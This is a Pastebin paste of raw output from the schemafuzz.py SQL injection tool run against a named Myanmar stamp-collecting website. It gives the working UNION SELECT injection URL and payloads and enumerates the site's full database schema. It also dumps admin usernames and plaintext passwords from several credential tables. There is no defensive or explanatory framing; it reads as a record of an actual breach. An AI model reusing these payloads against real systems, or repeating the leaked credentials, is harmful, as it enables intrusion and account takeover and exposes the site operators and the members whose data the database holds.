API tools faq
paste
Advertisement
bl4ck4ng3l

myanmar fvcking web

bl4ck4ng3l
Aug 10th, 2012
118
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.64 KB | None | 0 0
raw download clone embed print report
  1. [+] URL:http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
  2. [+] Evasion Used: "+" "--"
  3. [+] 12:19:06
  4. [+] Proxy Not Given
  5. [+] Gathering MySQL Server Configuration...
  6. Database: stampsmyanmar
  7. User: [email protected]
  8. Version: 5.1.30-community
  9. [+] Showing Tables & Columns from database "stampsmyanmar"
  10. [+] Number of Tables: 46
  11.  
  12. [Database]: stampsmyanmar
  13. [Table: Columns]
  14. [0]special_sale: sale_id,sale_title,sale_description,sale_year,sale_price,sale_forhome
  15. [1]stmyr_admin: admin_username,admin_password,admin_level
  16. [2]stmyr_article: id,title,snote,detail,date,author,artref,formediahome
  17. [3]stmyr_coi: coi_id,coi_countrycode,coi_membercode,coi_materialcode,coi_imgcode,coi_title,coi_description,coi_price,coi_year,coi_yearrangecode,coi_continentcode,coi_quantity,coi_forhome,coi_newarrivalforhome,coi_condition,coi_status,coi_mainthemes,coi_subthemes,coi_fullimgcode
  18. [4]stmyr_continents: continents_code,continents_name
  19. [5]stmyr_country: country_id,country_name,country_code,continent_code,country_img
  20. [6]stmyr_cov: cov_id,cov_countrycode,cov_membercode,cov_materialcode,cov_imgcode,cov_title,cov_description,cov_price,cov_year,cov_yearrangecode,cov_continentcode,cov_quantity,cov_forcollectionhome,cov_newarrivalforhome,cov_homecollection,cov_newarrivalforcollection,cov_condition,cov_status,cov_mainthemes,cov_subthemes,cov_fullimgcode
  21. [7]stmyr_cto: cto_id,cto_countrycode,cto_membercode,cto_materialcode,cto_imgcode,cto_title,cto_description,cto_price,cto_year,cto_yearrangecode,cto_continentcode,cto_quantity,cto_forcollectionhome,cto_newarrivalforhome,cto_homecollection,cto_newarrivalforcollection,cto_condition,cto_status,cto_mainthemes,cto_subthemes
  22. [8]stmyr_election: election_id,election_img,election_title
  23. [9]stmyr_env: env_id,env_countrycode,env_membercode,env_materialcode,env_imgcode,env_title,env_description,env_price,env_year,env_yearrangecode,env_continentcode,env_quantity,env_forcollectionhome,env_newarrivalforhome,env_homecollection,env_newarrivalforcollection,env_condition,env_status,env_mainthemes,env_subthemes
  24. [10]stmyr_exhibition: exhibition_id,exhibition_img,exhibition_title
  25. [11]stmyr_exhibition_admin: ex_admin_username,ex_admin_password
  26. [12]stmyr_exhibitor: exhibitor_id,exhibitor_name,exhibitor_title,exhibitor_bio,exhibitor_address,exhibitor_email,exhibitor_phone,exhibitor_foldername,exhibitor_gender,exhibitor_img
  27. [13]stmyr_exhibitor_pic: expic_id,expic_exhibitor_id,expic_picname,expic_countid
  28. [14]stmyr_fanclub: fc_id,fc_first_name,fc_last_name,fc_nick_name,fc_address,fc_street,fc_city,fc_state,fc_country,fc_postalcode,fc_phonecode,fc_phone,fc_fax,fc_username,fc_password,fc_email,fc_isshow,fc_gender,fc_date,fc_month,fc_year,fc_ethnicity,fc_actcode,fc_isactivate,fc_photo,fc_last_login,fc_access_ip,fc_created_date,fc_created_ip,fc_bio,fc_activities,fc_interests,fc_music,fc_books,fc_movies,fc_television,fc_highschool,fc_college_uni,fc_jobtitle,fc_gtalk,fc_aim,fc_skype,fc_yahoo,fc_isshowaddress
  29. [15]stmyr_fc_admin: fcadmin_username,fcadmin_password,fcadmin_nickname
  30. [16]stmyr_fdc: fdc_id,fdc_countrycode,fdc_membercode,fdc_materialcode,fdc_imgcode,fdc_title,fdc_description,fdc_price,fdc_year,fdc_yearrangecode,fdc_continentcode,fdc_quantity,fdc_forhome,fdc_forfdchome,fdc_forcollectionhome,fdc_newarrivalforfdchome,fdc_newarrivalforfdc,fdc_newarrivalforhome,fdc_homecollection,fdc_newarrivalforcollection,fdc_condition,fdc_status,fdc_mainthemes,fdc_subthemes,fdc_fullimgcode
  31. [17]stmyr_fly: fly_id,fly_countrycode,fly_membercode,fly_materialcode,fly_imgcode,fly_title,fly_description,fly_price,fly_year,fly_yearrangecode,fly_continentcode,fly_quantity,fly_forcollectionhome,fly_newarrivalforhome,fly_homecollection,fly_newarrivalforcollection,fly_condition,fly_status,fly_mainthemes,fly_subthemes
  32. [18]stmyr_homeforexhibition: hex_id,hex_title,hex_details,hex_show
  33. [19]stmyr_internationalstampissues: intissues_id,intissues_imgcode,intissues_title,intissues_description,intissues_note,intissues_price,intissues_country,intissues_issuedate,intissues_display,intissues_formediahome
  34. [20]stmyr_journey: journey_id,journey_img,journey_title
  35. [21]stmyr_kevin_journey: journey_id,journey_img,journey_title
  36. [22]stmyr_login: login_username,login_password
  37. [23]stmyr_ltr: ltr_id,ltr_countrycode,ltr_membercode,ltr_materialcode,ltr_imgcode,ltr_title,ltr_description,ltr_price,ltr_year,ltr_yearrangecode,ltr_continentcode,ltr_quantity,ltr_forhome,ltr_type,ltr_forltrhome,ltr_newarrivalforltr,ltr_newarrivalforltrhome,ltr_newarrivalforhome,ltr_newarrivalforcollection,ltr_condition,ltr_status,ltr_mainthemes,ltr_subthemes
  38. [24]stmyr_ltrtype: ltrtype_id,ltrtype_name
  39. [25]stmyr_mainthemes: mthemes_id,mthemes_name,mthemes_display
  40. [26]stmyr_marketplace: mp_id,mp_person,mp_images,mp_title,mp_description,mp_country,mp_price,mp_display,mp_upload_datetime
  41. [27]stmyr_materialtype: material_id,material_name,material_code
  42. [28]stmyr_member: member_id,member_name,member_nickname,member_address,member_country,member_email,member_telno,member_faxno,member_postalcode,member_createddate,member_foldername
  43. [29]stmyr_mp_comment: mp_comment_id,mp_mp_id,mp_comment_person,mp_comment_data,mp_comment_datetime
  44. [30]stmyr_newsletters: nlid,nltitle,nlnote,place,date,month,year,nimg,new_type,short_note,forhome,noteforhome
  45. [31]stmyr_ozone: ozone_id,ozone_img,ozone_title
  46. [32]stmyr_pcd: pcd_id,pcd_countrycode,pcd_membercode,pcd_materialcode,pcd_imgcode,pcd_title,pcd_description,pcd_price,pcd_year,pcd_yearrangecode,pcd_continentcode,pcd_quantity,pcd_type,pcd_sdcode,pcd_forhome,pcd_forpcdhome,pcd_forcollectionhome,pcd_newarrivalforpcd,pcd_newarrivalforpcdhome,pcd_newarrivalforhome,pcd_homecollection,pcd_newarrivalforcollection,pcd_condition,pcd_status,pcd_mainthemes,pcd_subthemes,pcd_fullimgcode
  47. [33]stmyr_pcdtype: pcdtype_id,pcdtype_name
  48. [34]stmyr_post: post_id,post_person,post_data,post_date_time
  49. [35]stmyr_profile_post: post_profile_id,post_profile_person,post_profile_data,post_profile_datetime,post_profile_fan_id,post_fc_id
  50. [36]stmyr_reg: reg_id,reg_countrycode,reg_membercode,reg_materialcode,reg_imgcode,reg_title,reg_description,reg_price,reg_year,reg_yearrangecode,reg_continentcode,reg_quantity,reg_forcollectionhome,reg_newarrivalforhome,reg_homecollection,reg_newarrivalforcollection,reg_condition,reg_status,reg_mainthemes,reg_subthemes
  51. [37]stmyr_reply_post: reply_id,reply_post_id,reply_person,reply_data,reply_date_time
  52. [38]stmyr_reply_profile_post: reply_profile_id,reply_profile_post_id,reply_profile_person,reply_profile_data,reply_profile_datetime,reply_profile_fan_id
  53. [39]stmyr_stampoftheweek: sotw_id,sotw_code,sotw_name,sotw_issuedate,sotw_country,sotw_description,sotw_forhome,sotw_postmonth,sotw_postyear
  54. [40]stmyr_statedivision: sd_code,sd_name
  55. [41]stmyr_stm: stm_id,stm_countrycode,stm_membercode,stm_materialcode,stm_imgcode,stm_title,stm_description,stm_price,stm_year,stm_yearrangecode,stm_continentcode,stm_quantity,stm_sgno,stm_myanmarissue,stm_issueformediahome,stm_formmstamphome,stm_newarrivalformmstamp,stm_newarrivalformmstamphome,stm_forcollectionhome,stm_forhome,stm_mainthemes,stm_subthemes,stm_countryshow,stm_newarrivalforhome,stm_forasean,stm_formm,stm_homecollection,stm_newarrivalforcollection,stm_condition,stm_status,stm_scno,stm_specialcode,stm_fullimgcode
  56. [42]stmyr_tusm: tusm_id,tusm_countrycode,tusm_membercode,tusm_materialcode,tusm_imgcode,tusm_receiveddate,tusm_note,tusm_forhome,tusm_fortusmhome,tusm_gotocollections,tusm_attach
  57. [43]stmyr_tusm_foru: foru_id,foru_countrycode,foru_membercode,foru_materialcode,foru_imgcode,foru_returneddate,foru_note,foru_foruhome,foru_attached,foru_excel,foru_noclaim,foru_register
  58. [44]stmyr_wantlist: wantlist_id,wantlist_fanid,wantlist_countrycode,wantlist_membercode,wantlist_materialcode,wantlist_imgcode,wantlist_date,wantlist_note,wantlist_display,wantlist_exchangepic,wantlist_nickname
  59. [45]stmyr_yearrange: yearrange_id,yearrange_name
  60.  
  61. [-] [12:42:44]
  62. [-] Total URL Requests 463
  63. [-] Done
  64.  
  65. |---------------------------------------------------------------|
  66. | rsauron[@]gmail[dot]com v5.0 |
  67. | 6/2008 schemafuzz.py |
  68. | -MySQL v5+ Information_schema Database Enumeration |
  69. | -MySQL v4+ Data Extractor |
  70. | -MySQL v4+ Table & Column Fuzzer |
  71. | Usage: schemafuzz.py [options] |
  72. | -h help darkc0de.com |
  73. |---------------------------------------------------------------|
  74.  
  75. [+] URL:http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
  76. [+] Evasion Used: "+" "--"
  77. [+] 13:23:43
  78. [+] Proxy Not Given
  79. [+] Gathering MySQL Server Configuration...
  80. Database: stampsmyanmar
  81. User: [email protected]
  82. Version: 5.1.30-community
  83. [+] Dumping data from database "stampsmyanmar" Table "stmyr_admin"
  84. [+] Column(s) ['admin_username', 'admin_password']
  85. [+] Number of Rows: 10
  86.  
  87. [0] stmadministrator:cms@2012:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 0,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  88.  
  89. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:stmadministrator:cms@2012:
  90. [1] username4cover:Pass4cover:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 1,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  91.  
  92. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4cover:Pass4cover:
  93. [2] username4fdc:Pass4fdc:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 2,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  94.  
  95. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4fdc:Pass4fdc:
  96. [3] username4ltr:Pass4ltr:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 3,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  97.  
  98. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4ltr:Pass4ltr:
  99. [4] username4media:Pass4media:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 4,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  100.  
  101. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4media:Pass4media:
  102. [5] username4pcd:Pass4pcd:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 5,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  103.  
  104. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4pcd:Pass4pcd:
  105. [6] username4postal:Pass4postal:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 6,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  106.  
  107. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4postal:Pass4postal:
  108. [7] username4sotw:Pass4sotw:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 7,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  109.  
  110. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4sotw:Pass4sotw:
  111. [8] username4stamp:Pass4stm:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 8,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  112.  
  113. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4stamp:Pass4stm:
  114. [9] username4tusm:Pass4tusm:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 9,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  115.  
  116. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4tusm:Pass4tusm:Pass4tusm:
  117.  
  118. [-] [13:25:14]
  119. [-] Total URL Requests 12
  120. [-] Done
  121.  
  122. |---------------------------------------------------------------|
  123. | rsauron[@]gmail[dot]com v5.0 |
  124. | 6/2008 schemafuzz.py |
  125. | -MySQL v5+ Information_schema Database Enumeration |
  126. | -MySQL v4+ Data Extractor |
  127. | -MySQL v4+ Table & Column Fuzzer |
  128. | Usage: schemafuzz.py [options] |
  129. | -h help darkc0de.com |
  130. |---------------------------------------------------------------|
  131.  
  132. [+] URL:http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
  133. [+] Evasion Used: "+" "--"
  134. [+] 13:36:17
  135. [+] Proxy Not Given
  136. [+] Gathering MySQL Server Configuration...
  137. Database: stampsmyanmar
  138. User: [email protected]
  139. Version: 5.1.30-community
  140. [+] Dumping data from database "stampsmyanmar" Table "stmyr_exhibition_admin"
  141. [+] Column(s) ['ex_admin_username', 'ex_admin_password']
  142. [+] Number of Rows: 1
  143.  
  144. [0] ex@dmin:exmltst@mp:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,ex_admin_username,0x1e,ex_admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_exhibition_admin LIMIT 0,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  145.  
  146. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:ex@dmin:exmltst@mp:exmltst@mp:
  147.  
  148. [-] [13:36:27]
  149. [-] Total URL Requests 3
  150. [-] Done
  151.  
  152. |---------------------------------------------------------------|
  153. | rsauron[@]gmail[dot]com v5.0 |
  154. | 6/2008 schemafuzz.py |
  155. | -MySQL v5+ Information_schema Database Enumeration |
  156. | -MySQL v4+ Data Extractor |
  157. | -MySQL v4+ Table & Column Fuzzer |
  158. | Usage: schemafuzz.py [options] |
  159. | -h help darkc0de.com |
  160. |---------------------------------------------------------------|
  161.  
  162. [+] URL:http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
  163. [+] Evasion Used: "+" "--"
  164. [+] 13:37:20
  165. [+] Proxy Not Given
  166. [+] Gathering MySQL Server Configuration...
  167. Database: stampsmyanmar
  168. User: [email protected]
  169. Version: 5.1.30-community
  170. [+] Dumping data from database "stampsmyanmar" Table "stmyr_login"
  171. [+] Column(s) ['login_username', 'login_password']
  172. [+] Number of Rows: 1
  173.  
  174. [0] linlex:linlex@dmin:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,login_username,0x1e,login_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_login LIMIT 0,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  175.  
  176. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:linlex:linlex@dmin:linlex@dmin:
  177.  
  178. [-] [13:37:33]
  179. [-] Total URL Requests 3
  180. [-] Done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!